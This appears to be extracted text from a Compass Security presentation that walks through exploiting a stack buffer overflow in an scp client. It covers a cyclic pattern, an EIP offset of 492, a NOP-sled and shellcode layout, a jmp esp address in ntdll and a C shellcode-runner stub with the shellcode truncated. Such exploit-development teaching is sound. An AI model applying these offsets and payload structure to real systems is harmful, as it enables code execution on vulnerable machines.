PowerPoint Presentation - Compass Security
$ scp <remotefile> <localfile>
$ scp <Ax500> whatever.txt
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Analyze:
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
Stored EIP @ location 492
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Verification
Analyze:
AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
payload[492]
sEIP
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Verification
Analyze:
AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
sEIP
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Verification
Analyze:
AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
ESP
sEIP
msfpayload:
msfencode:
#include <stdio.h>

char code[] = "\xbb\xa0\xc9\xa5 ... ";

int main(int argc, char **argv)
{
    char x[500];
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
}
GCC@WIN:
www.mingw.org
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab
Trigger:
Verification:
Analyze:
AAAAAAAAAA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC BBBB
Aa0Aa1Aa2A 4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4 a3Aa
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
Exploit: ESP
sEIP
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
Code
Stack
… jmp %esp …
[Filename] &caller [Stuff…] [Stuff…] [Stuff…] [Stuff…]
EIP (copy filename)
Stored EIP (caller)
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
… jmp %esp …
AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>
ESP
EIP (copy filename)
Stored EIP (caller)
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
… jmp %esp …
AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>
ESP
EIP
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
… jmp %esp …
AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>
ESP, EIP
AAAAAAAAAA <nopnopnop shellcode shellcode> &JMP
… jmp %esp …
AAAAAAAAAAA &JMP <nopnopnop> <nopnopnop> <shellcode> <shellcode>
ESP
EIP
Stored EIP
Shellcode
Filler
Stored EIP
Shellcode
Filler
&(jmp %esp @ ntdll): 0x7c91fcd8